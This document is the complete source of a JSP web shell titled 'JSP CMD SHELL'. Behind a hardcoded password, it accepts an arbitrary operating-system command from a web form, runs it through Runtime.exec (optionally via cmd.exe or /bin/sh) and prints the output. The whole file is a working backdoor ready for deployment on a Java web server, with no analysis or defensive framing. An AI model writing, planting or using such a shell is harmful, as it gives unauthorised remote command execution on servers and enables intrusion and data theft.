<%@ page import="java.util.*,java.io.*"%>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>JSP CMD SHELL</title>
    <style>
      input{border:1px solid #ccc;height:25px;}.icmd{padding:2px 5px;width:50%;}.isb{height:30px;cursor:pointer;}.isb:hover{background-color:#2f2f2f;color:#fff;}.checkbox-wrap{display:inline;margin:0 auto;background-color:white;}input[type="checkbox"]{display:none;}input[type="checkbox"]+label{display:inline-block;margin-top:10px;margin-left:5px;text-align:left;-webkit-box-sizing:border-box;}label::before{content:"";display:inline-block;width:30px;height:30px;background:#EEE;vertical-align:middle;-webkit-border-radius:50%;margin-right:5px;-webkit-box-sizing:border-box;-webkit-transition:background ease-in .5s}input[type="checkbox"]:checked+label::before{background-color:rgb(53,183,111);border:5px #EEEEEE solid;}
    </style>
</head>
<body>
<%
String ipw = request.getParameter("p");
String pw = "V9jziYDPk4GGptKL";
if(ipw != null && ipw.trim().equals(pw)) {
%>
<form method="POST" name="myform" action="?p=<%=pw%>">
<input class="icmd" type="text" name="cmd">
<div class="checkbox-wrap">
  <input type="checkbox" value="1" name="usepipe" id="usepipe">
  <label for="usepipe">Use Pipe or redirection </label>
  </div>
<input class="isb" type="submit" value="execute">
</form>
<pre>
<%
String osname = System.getProperty("os.name").toLowerCase();
String cmdstr = request.getParameter("cmd");
String usepipe = request.getParameter("usepipe");
String[] cmdarray;
Process p;
if (cmdstr != null) {
    cmdstr = cmdstr.trim();
    out.println("Command: " + cmdstr + "<hr />");
    if(usepipe!= null && usepipe.equals("1")) {
        if (osname.indexOf("windows") >= 0) {
            cmdarray = new String[] {
                "cmd.exe",
                "/c",
                cmdstr
            };
        } else {
            cmdarray = new String[] {
                "/bin/sh",
                "-c",
                cmdstr
            };
        }
        p = Runtime.getRuntime().exec(cmdarray, null);
    }
    else {
        p = Runtime.getRuntime().exec(cmdstr);
    }
    
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream( in );
    String disr = dis.readLine();
    while (disr != null) {
        out.println(disr);
        disr = dis.readLine();
    }
}
}
%>
</pre>
</body>
</html>
